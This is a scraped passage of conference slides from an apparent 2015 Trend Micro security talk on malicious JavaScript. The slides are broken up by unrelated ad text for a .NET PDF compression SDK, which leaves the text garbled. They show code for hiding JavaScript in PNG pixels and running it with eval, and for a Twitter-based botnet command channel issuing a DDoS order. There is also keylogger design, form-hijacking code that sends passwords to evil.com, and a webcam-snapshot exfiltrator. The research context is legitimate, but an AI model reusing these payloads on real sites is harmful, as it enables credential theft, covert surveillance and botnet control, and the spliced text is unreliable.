asp.net open pdf : Best pdf compression tool SDK application API .net windows asp.net sharepoint OK-P15-Renaud-Bidou-Powered-by-Javascript2-part2086

Copyright 2015 Trend Micro Inc.     
21
# perl make-image.pl -j "alert('Gotcha')" -v
------[       MAKE IMAGE v1.0       ]------
Renaud Bidou
[+] Number of pixels in the image: 15
[+] Image xss.png will be 3 x 3
[+] Pixel 0: 97 (0x61) / 108 (0x6c) / 101 (0x65)
[+] Pixel 1: 114 (0x72) / 116 (0x74) / 40 (0x28)
[+] Pixel 2: 39 (0x27) / 71 (0x47) / 111 (0x6f)
[+] Pixel 3: 116 (0x74) / 99 (0x63) / 104 (0x68)
[+] Pixel 4: 97 (0x61) / 39 (0x27) / 41 (0x29)
[+] Pixel 5: 0 (0x00) / 0 (0x00) / 0 (0x00)
[+] Pixel 6: 0 (0x00) / 0 (0x00) / 0 (0x00)
[+] Pixel 7: 0 (0x00) / 0 (0x00) / 0 (0x00)
[+] Pixel 8: 0 (0x00) / 0 (0x00) / 0 (0x00)
[+] xss.png created. Up to you now!
JavaScript in PNG
Step 1: Encode Javascriptinto PNG 8 bits color depth image
Indexedcolors
Truecolors
Best pdf compression tool - Compress reduce PDF size in C#.net, ASP.NET, MVC, Ajax, WinForms, WPF
C# Code & .NET API to Compress & Decompress PDF Document
change font size in pdf; change paper size pdf
Best pdf compression tool - VB.NET PDF File Compress Library: Compress reduce PDF size in vb.net, ASP.NET, MVC, Ajax, WinForms, WPF
VB.NET PDF Document Compression and Decompression Control SDK
pdf page size; change font size in pdf form field
Copyright 2015 Trend Micro Inc.     
22
JavaScript in PNG
Step 2: An innocuous-looking malicious piece of code
function loadFile() {
var strFile e = 'xss.png';
loadPNGData(strFile,eval(strData));
}
var oImg = new Image();
oImg.src = strFile e ;
oImg.onload = function() {
var iWidth h = this.offsetWidth;
var iHeight = this.offsetHeight;
oCtx.drawImage(this,0,0);
var oData = oCtx.getImageData(0,0,iWidth,iHeight).data;
var a = [];
var h = [];
var len n = oData.length;
var p = -1;
for(var i=0;i<len;i+=1) {
if(oData[i] > 0) {
var charDec = oData[i];                    
if (charDec != 255) {
a[++p] = String.fromCharCode(charDec);
h[p] = oData[i];
}
}
}
var strData = a.join("");            
if(fncCallback) {
fncCallback(strData);
}
document.body.removeChild(oImg);
}
<imgsrc=‘…’>
SOP-free
mosltyCSP-free
Load
&
Decode
1
2
3
Cleanup
Execute
4
C# PDF Convert to Tiff SDK: Convert PDF to tiff images in C#.net
Best C#.NET PDF converter SDK for converting PDF to Supports tiff compression selection. library control (XDoc.PDF) is a multifunctional PDF document converting
apple compress pdf; pdf optimized format
VB.NET PDF - Convert PDF Online with VB.NET HTML5 PDF Viewer
Best Visual Studio .NET HTML5 PDF Viewer PDF Viewer control as Export multiple pages PDF document to multi-page Tiff Able to choose TIFF file compression mode.
change file size of pdf document; best way to compress pdf
Copyright 2015 Trend Micro Inc.     
23
JavaScript in PNG
Step 3: Run it !
C# HTML5 PDF Viewer SDK to convert and export PDF document to
Best Visual Studio .NET HTML5 PDF Viewer PDF Viewer control as Export multiple pages PDF document to multi-page Tiff Able to choose TIFF file compression mode.
change font size pdf; change font size pdf form reader
Command & Control
THE SINEWSOF WAR
24
Copyright 2015 Trend Micro Inc.     
Copyright 2015 Trend Micro Inc.     
25
@botnet_master:
#botnet_command ddos www.target.com
var master = "/botnet_master" " ;
var query = encodeURIComponent("botnet_command");
setInterval(getTwitter,30000); 
function getTwitter() {
[...]
xmlhttp.open("GET", 
"https://query.yahooapis.com/v1/public/yql?q=selec
t%20*%20from%20html%20where%20url%3D%22https%3A%2F
%2Ftwitter.com%2Fsearch%3Fq%3D%2523" + query + 
"%26src%3Dtypd%26vertical%3Ddefault%26f%3Dtweets%2
2&diagnostics=true", true);
xmlhttp.send();
parseCommand(xmlhttp.responseText);
}
<a 
class="account-group js-user-profile-link" 
data-user-id="2513409536" 
href="/botnet_master">
<p 
class="TweetTextSize js-tweet-text tweet-text" 
data-aria-label-part="0" 
lang="en">
ddos www.target.com
Embedded command
RawJavaScript
Image URL
<a
class="twitter-timeline-link u-hidden"
data-pre-embedded="true"
dir="ltr" href="https://t.co/smv56W45W9">
pic.twitter.com/smv56W45W9
</a>
Twitter-basedC&C
BOTNET
MASTER
Operations
THE MAGICOF JAVASCRIPT
26
Copyright 2015 Trend Micro Inc.     
Copyright 2015 Trend Micro Inc.     
27
Capture
Keyloggers
Can tracksessions
Identifies textfieldsname
10.14.3.14
7147655144799501
username
test
password
test_password
Createinvisible iFrame
1
Change iFramesource withquerystring
Createspecificquerystring 
3
Store in logfile
4
NO SOP…
Key
Field
Session ID
for eachkeyPressedevent
Copyright 2015 Trend Micro Inc.     
28
Capture
Keyloggers
Can tracksessions
Identifies textfieldsname
Browser
Screenshots
History
HTML2CANVAS
CreateHTML5 <canvas> object
ConvertsHTML objectsintodrawings
Define<canvas> withdrawings
Exports resultsintoPNG file
Sniffly
1
Abuses HSTS and CSP
User connectsto malicioussite
1
CSP to allowimages fromHTTP only
CSP
Images loadattemptsare performedto HSTS sites
3
3
HSTS
HTTPS
onerrorhandleriscalledand timerset
a
Image load~1ms : HSTS redirect, site alreadyvisited
a
b
b
Image load>1ms : HTTP request, site not visited
!
Copyright 2015 Trend Micro Inc.     
29
Capture
Keyloggers
Can tracksessions
Identifies textfieldsname
Browser
Screenshots
History
Forms
Values leak
MitM
function intercept t () { 
var password = document.forms[0].elements[1].value; 
/* do whatever you u want with "password" */ 
document.forms[0].onsubmit = intercept; 
window.setTimeout(function () { 
document.forms[0].action = "http://evil.com/steal_pass"; 
document.forms[0].submit(); 
}, 10000); 
Addonsubmiteventhandler
Stealfromauto-complete
var f=document.forms;
var i=f.length-1;
do{
var old_action n = f[i].action;
f[i].action="http://evil.com/mitm?url="+old_action;
f[i].onsubmit=null;
}while(--i); 
Interceptall forms
Submitafter10s
Change formtargetURL
Copyright 2015 Trend Micro Inc.     
30
Users
Images
Webcam Snapshot
CreateHTML5 <canvas> object
CreateHTML5 <video>
Getstreamfrom<video>
Define<canvas> from<video> source
Export resultto PNG file
Exploits HTML5 capabilities
navigator.getUserMedia({video:true}, 
function (stream) { 
video.src = window.URL.createObjectURL(stream); 
localMediaStream = stream; 
window.setInterval("snapshot()", 5000); 
},onCameraFail);
function snapshot() {
ctx.drawImage(video, 0, 0, 480, 320);
var dat = canvas.toDataURL('image/png');
xmlhttp.open("POST", "http://127.0.0.1/webcam.php", true);
xmlhttp.setRequestHeader(
"Content-type", 
"application/x-www-form-urlencoded«
);
var x=encodeURIComponent(dat);
xmlhttp.send("data=" + x);
}
Documents you may be interested
Documents you may be interested